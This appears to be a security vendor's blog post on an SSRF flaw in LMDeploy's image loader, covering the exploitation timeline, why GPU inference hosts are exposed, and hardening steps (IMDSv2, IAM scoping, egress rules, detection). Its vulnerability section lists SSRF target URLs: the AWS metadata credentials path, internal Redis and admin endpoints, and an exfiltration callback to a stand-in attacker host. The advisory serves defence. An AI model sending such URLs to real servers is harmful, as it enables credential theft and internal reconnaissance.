LMDeploy CVE-2026-33626: Your AI Inference Stack Is the Next Attack Surface

On April 22, 2026, attackers exploited a server-side request forgery vulnerability in LMDeploy within roughly 13 hours of public disclosure. The flaw turned a vision-language image loader into a generic SSRF primitive that probed AWS metadata, Redis, and MySQL on the model host. Here is what happened, why AI inference servers are uniquely exposed, and how to harden yours.


TL;DR

  • What happened: a server-side request forgery (SSRF) vulnerability in LMDeploy was exploited in the wild within ~13 hours of public disclosure
  • CVE: CVE-2026-33626, CVSS 7.5
  • Affected versions: all LMDeploy versions prior to 0.12.3
  • Vulnerable function: load_image() in lmdeploy/vl/utils.py, which fetches arbitrary URLs without validating internal or private IP addresses
  • First exploitation: detected by Sysdig honeypots on April 22, 2026 at 03:35 UTC, originating from IP 103.116.72.119
  • What attackers did: used the image loader as a generic HTTP SSRF primitive to scan the AWS Instance Metadata Service (IMDS), Redis (6379), MySQL (3306), and internal HTTP admin interfaces
  • The real prize: IAM credentials from AWS IMDS, since vision LLM nodes typically run on GPU instances with broad IAM roles attached

Action timeline:

  • Immediately: upgrade LMDeploy to 0.12.3+ on every model server
  • This week: enforce IMDSv2 with hop-limit 1 on every GPU instance
  • This week: audit the IAM role attached to each inference node
  • This sprint: egress-restrict model servers; deny outbound to private IP ranges and metadata endpoints

If you serve an open-source LLM in production with LMDeploy, vLLM, TGI, or any framework that loads remote images for vision models, treat AI inference nodes as a first-class attack surface. The same SSRF pattern that compromised LMDeploy honeypots will surface in adjacent projects. The fastest containment is IMDSv2 plus an egress firewall, not waiting for the next CVE.


What Is LMDeploy?

LMDeploy is an open-source toolkit for compressing, deploying, and serving large language models. Maintained as part of the InternLM project, it supports inference for both text and vision-language models (VLMs) such as InternVL and InternLM-XComposer. Engineering teams use it to self-host open-weight models on GPU infrastructure, often as an alternative to managed inference services.

Like other inference servers — vLLM, Text Generation Inference, Ollama — LMDeploy exposes an HTTP API that accepts prompts and returns model output. For vision-language models, that API also accepts image inputs, which can be supplied as a URL.

That image loader is where the vulnerability lives.

The Vulnerability: A Familiar SSRF Pattern in a New Place

CVE-2026-33626 is a server-side request forgery (SSRF) flaw in LMDeploy's load_image() function in lmdeploy/vl/utils.py. When the API receives a request with an image URL, the server fetches that URL on behalf of the user. The bug: it does not validate that the URL points to an external resource. It will happily fetch:

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/ — the AWS Instance Metadata Service (IMDS)
  • http://localhost:6379/ — a Redis instance bound to the loopback interface
  • http://10.0.0.5:8080/admin — internal admin endpoints on the same VPC
  • http://attacker.example.com/callback?token=... — out-of-band exfiltration
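Conceptually, the missing guard is a resolve-and-classify check before any fetch. A minimal sketch (hypothetical code, not LMDeploy's actual patch) that would refuse every internal target above:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_internal_url(url: str) -> bool:
    """Return True for URLs an image loader should refuse: anything that
    resolves to a loopback, link-local, or RFC 1918 private address."""
    host = urlparse(url).hostname
    if host is None:
        return True  # unparseable URL: refuse
    try:
        # A literal IP resolves to itself; hostnames go through DNS.
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True  # unresolvable: refuse
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        if addr.is_loopback or addr.is_link_local or addr.is_private:
            return True
    return False

# The internal targets from the list above are all refused:
assert is_internal_url("http://169.254.169.254/latest/meta-data/iam/security-credentials/")
assert is_internal_url("http://127.0.0.1:6379/")  # loopback, e.g. Redis
assert is_internal_url("http://10.0.0.5:8080/admin")
```

Note that a resolve-then-fetch split is still exposed to DNS rebinding; a production check should pin the resolved address and use it for the actual request.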

The bug pattern is well known. Application security teams have been hunting it in web apps for over a decade. It is now showing up in AI infrastructure code that, in many cases, was written by ML engineers without a security review.

The CVSS score is 7.5, but the score understates the impact. SSRF in a vanilla web app is bad. SSRF on a GPU-hosted inference node is worse, for a reason we will get to.

Timeline: 13 Hours From Disclosure to Exploitation

  • April 21, 2026 (~15:04 UTC): Public advisory published on GitHub for LMDeploy CVE-2026-33626
  • April 22, 2026 at 03:35 UTC: Sysdig honeypots detect the first exploitation attempt, 12 hours and 31 minutes after disclosure (per Sysdig's research note; some reporting rounds this to 13 hours)
  • The attacker (originating from IP 103.116.72.119) ran a single eight-minute session of 10 distinct requests across three phases
  • Phase 1: Probes against AWS IMDS at 169.254.169.254 to attempt to extract IAM credentials
  • Phase 2: Port scans of 127.0.0.1:6379 (Redis), 127.0.0.1:3306 (MySQL), and ports 80 and 8080 for HTTP admin interfaces
  • Phase 3: Out-of-band DNS exfiltration to confirm blind SSRF behavior
  • Across the session: requests varied the model parameter between vision-language models (internlm-xcomposer2, OpenGVLab/InternVL2-8B). Sysdig observed this rotation; whether it was a deliberate evasion technique or an artifact of the tooling is not confirmed

The 13-hour window is consistent with what we now expect from automated exploitation infrastructure. Attackers monitor public advisory feeds, generate working exploits with the help of LLMs, and run them against internet-exposed instances within a single business day.

Why AI Inference Servers Are Uniquely Exposed

A textbook SSRF is bad on any server. SSRF on a GPU-hosted inference node is materially worse. Three factors make AI inference infrastructure uniquely exposed.

GPU instances tend to have broad IAM roles

GPU instances are expensive. To justify the cost, teams often consolidate workloads on them. The instance fetches model weights from S3, writes inference logs to CloudWatch, pulls configuration from Parameter Store, and may write outputs to a shared object store. The IAM role attached to the instance accumulates broad permissions, often more than any individual workload needs.

When an attacker exfiltrates that IAM role through SSRF, they inherit all of those permissions. One IMDS fetch can compromise the entire AWS account.

IMDSv1 is still common

IMDSv2, which requires a session token and supports hop-limit restrictions to defeat SSRF, has been available since 2019. AWS has been pushing customers to migrate for years. Despite this, plenty of GPU AMIs and Terraform modules still default to IMDSv1.

If your inference nodes still expose IMDSv1, an SSRF in any process running on the node hands the attacker a working session in seconds. There is no MFA, no key rotation, no audit hook. The metadata endpoint just answers.

Inference servers are designed to make outbound HTTP requests

A traditional web app rarely needs to fetch arbitrary URLs from user input. An inference server with vision-language support is designed to fetch URLs. Image loading, weight pulling from Hugging Face, fetching reference documents for retrieval-augmented generation — all of these involve outbound HTTP from the model host.

This makes egress restriction harder. You cannot simply block all outbound HTTP from the inference node, because the inference node legitimately makes outbound HTTP requests as part of normal operation. Egress filtering has to be precise: deny private IP ranges and metadata endpoints, allow specific external domains.

How This Connects to the Rest of the AI Security Picture

We have written extensively about AI agent security, MCP attack vectors, and the enterprise AI security stack. LMDeploy CVE-2026-33626 sits in a layer of the stack that often gets less attention: the inference infrastructure itself.

A complete AI security picture covers four layers, from the prompt down:

  1. The prompt and the model output — prompt injection, jailbreaks, hallucinated tool calls
  2. The agent and tool use layer — overprivileged tools, untrusted data triggering actions, MCP-specific risks
  3. The application that wraps the model — auth, multi-tenancy, output validation
  4. The inference server itself — the focus of CVE-2026-33626

Most teams have controls at layers 1 through 3. Layer 4, the model server itself, is often deployed with default settings on a GPU instance with a broad IAM role. LMDeploy made the cost of that decision visible.

If you are running open-source AI agents, the same exposure applies whenever the agent host has its own IAM role and exposes an HTTP API.

What to Do Right Now

1. Upgrade LMDeploy

Upgrade every LMDeploy deployment to 0.12.3 or newer. Track this as a security patch with the same rigor as a CVE in your web framework — because functionally, that is what it is.

If you cannot upgrade immediately, mitigate by:

  • Restricting which URLs the API will accept (allowlist of trusted hosts only)
  • Putting the inference server behind a strict egress proxy that rejects private IP ranges
  • Disabling vision-language endpoints if you do not use them
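If the allowlist route fits your deployment, the check can be as small as a hostname gate in front of the loader. A sketch with hypothetical host names:

```python
from urllib.parse import urlparse

# Hypothetical allowlist: the only hosts this deployment fetches images from.
TRUSTED_IMAGE_HOSTS = {"images.internal.example.com", "cdn.example.com"}

def accept_image_url(url: str) -> bool:
    """Accept only https URLs whose hostname is explicitly trusted."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_IMAGE_HOSTS

assert accept_image_url("https://cdn.example.com/input.png")
assert not accept_image_url("http://169.254.169.254/latest/meta-data/")
assert not accept_image_url("https://cdn.example.com@evil.example.net/x.png")
```

Comparing parsed.hostname rather than doing a substring match on the URL is what defeats the userinfo trick in the last assertion.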

2. Enforce IMDSv2 with hop-limit 1

This is the single highest-value change you can make today, and it applies to every workload on every cloud GPU instance, not only AI inference.

On AWS:

Bash
aws ec2 modify-instance-metadata-options \
  --instance-id i-xxxxxxxxxxxxxxxxx \
  --http-tokens required \
  --http-put-response-hop-limit 1 \
  --http-endpoint enabled

For new instances, set the same options in your launch template or Terraform module. We covered the broader cloud baseline in our CIS Benchmarks for AWS guide. The same principle applies on Azure and GCP: GPU instances should not run with permissive metadata defaults.

3. Re-scope the IAM role on each inference node

Most GPU IAM roles are broader than they need to be. Walk through what the inference workload actually needs. In most cases:

  • Read access to the specific S3 bucket holding the model weights (not all of S3)
  • Write access to the specific CloudWatch log group for that workload (not full CloudWatch)
  • No SSM, no Parameter Store, no IAM, no STS

If the role currently has *:* resource patterns, anything an SSRF can reach is in scope. Tighten before the next CVE.
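A least-privilege role for such a node might look like the following sketch; the bucket name, account ID, and log group are placeholders to adapt:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "ReadModelWeightsOnly",
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::example-model-weights/*"
    },
    {
      "Sid": "WriteWorkloadLogsOnly",
      "Effect": "Allow",
      "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
      "Resource": "arn:aws:logs:*:123456789012:log-group:/inference/example:*"
    }
  ]
}
```

Anything not explicitly allowed here — SSM, Parameter Store, IAM, STS — is denied by default, which is the point.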

4. Egress-restrict model servers

The minimum egress policy for an inference server:

  • Deny outbound to all RFC 1918 private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) except for explicit internal services that must be reached
  • Deny outbound to link-local addresses (169.254.0.0/16), which includes the metadata service
  • Allow outbound only to specific external domains (Hugging Face, your model artifact store, your logging endpoint)
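In code form, the deny half of that policy is a small classifier; wherever it is enforced (security group, egress proxy, host firewall), this is the rule. The internal-exception CIDR below is hypothetical:

```python
import ipaddress

# Denied destination ranges: RFC 1918 plus link-local (metadata service).
DENY_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16",
)]
# Hypothetical carve-out for an internal service the node must reach.
ALLOW_INTERNAL = [ipaddress.ip_network("10.0.42.0/24")]

def egress_allowed(dest_ip: str) -> bool:
    """Apply the deny-private/allow-exceptions half of the egress policy."""
    addr = ipaddress.ip_address(dest_ip)
    if any(addr in net for net in ALLOW_INTERNAL):
        return True
    return not any(addr in net for net in DENY_NETS)

assert not egress_allowed("169.254.169.254")  # metadata service: blocked
assert not egress_allowed("10.9.8.7")         # RFC 1918: blocked
assert egress_allowed("10.0.42.5")            # explicit internal exception
```

The domain-level allowlist for external destinations (the third bullet) layers on top of this, typically in an egress proxy rather than IP rules.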

This control alone would have stopped the LMDeploy exploitation attempt that Sysdig observed.

5. Add detection for the SSRF pattern

If you have a SIEM or runtime detection, build alerts for:

  • Outbound HTTP requests from inference nodes to 169.254.169.254
  • Outbound HTTP requests from inference nodes to private IP ranges that are not on the allow-list
  • Unexpected DNS queries from inference nodes to attacker-controlled domains
  • IAM role usage from unexpected source IPs

Sysdig and other CSPM/CWPP tools can catch this pattern. So can simple VPC flow log analysis if you do not have a runtime tool yet.
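Even without a runtime tool, the metadata-probe pattern is easy to pull out of default-format VPC flow logs. A sketch assuming the default v2 field layout (the sample record is fabricated):

```python
import ipaddress

# Link-local range containing the metadata service (169.254.169.254).
LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")

def is_metadata_probe(record: str) -> bool:
    """Flag a VPC flow log record whose destination address is link-local.
    Assumes the default v2 layout, where field index 4 is dstaddr:
    version account-id interface-id srcaddr dstaddr srcport dstport ...
    """
    fields = record.split()
    try:
        dst = ipaddress.ip_address(fields[4])
    except (IndexError, ValueError):
        return False
    return dst in LINK_LOCAL

sample = ("2 123456789012 eni-0a1b2c3d 10.0.1.15 169.254.169.254 "
          "49152 80 6 4 320 1745292900 1745292960 ACCEPT OK")
assert is_metadata_probe(sample)
```

Traffic from an EC2 host to its own metadata endpoint does not always appear in flow logs, so treat this as one signal alongside process-level telemetry, not a complete detection.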

What This Means for Your Compliance Posture

If you are pursuing SOC 2, ISO 27001, or ISO 42001, AI inference infrastructure is now firmly in scope.

Specific controls auditors will ask about:

  • CC6.1 (logical access security): how are you scoping IAM roles on inference nodes? Are credentials least-privilege?
  • CC6.6 (boundary protection): how do you protect against threats from outside the system boundary? Is egress restricted from inference nodes? Is the metadata service reachable from user-influenced HTTP fetches?
  • CC7.1 (vulnerability management): how do you track CVEs in AI infrastructure components like LMDeploy, vLLM, and TGI? What was your time-to-patch for CVE-2026-33626?
  • CC7.2 (system monitoring): do you detect anomalous outbound traffic from inference nodes?
  • A.8.16 (ISO 27001:2022, monitoring activities): same question for ISO
  • ISO 42001 Annex A controls like A.6.2.6 (AI system impact assessment) and A.8.2 (processes for responsible AI design and development): do you have documented risk and impact assessments for your inference infrastructure?

The 2026 SOC 2 audit conversation increasingly includes AI systems by default, as we covered in what changed in SOC 2 for 2026. If you are running open-source inference servers, expect questions.

The Bigger Picture

LMDeploy is not unique. The same SSRF pattern almost certainly exists in adjacent projects, including private internal forks. The economics of AI infrastructure development — fast iteration, ML engineers writing networking code, GPU costs forcing consolidation onto over-privileged instances — make the next CVE in this category likely a matter of weeks, not months.

The structural fix is to treat AI inference servers as the same kind of attack surface as a public web application:

  • Code is reviewed by security engineers
  • The host is hardened (IMDSv2, scoped IAM, egress filter)
  • CVEs are tracked, patched, and audited
  • Anomalous behavior is detected at runtime

The teams that already do this for their web stack now need to extend it one layer down, into the AI infrastructure.

Conclusion

CVE-2026-33626 is a textbook SSRF in a less-textbook place. The exploitation timeline — under 13 hours from public advisory to live exploitation — is the new normal for any vulnerability with a working proof of concept. The mitigations are not novel: upgrade, enforce IMDSv2, scope the IAM role, restrict egress, and detect the pattern. The novelty is that AI inference infrastructure now needs to be treated as production-grade attack surface, not as a research environment.

If you would like help threat modeling your AI infrastructure, scoping IAM roles on GPU workloads, or mapping these controls to a SOC 2 or ISO 27001 audit, get in touch with our team.


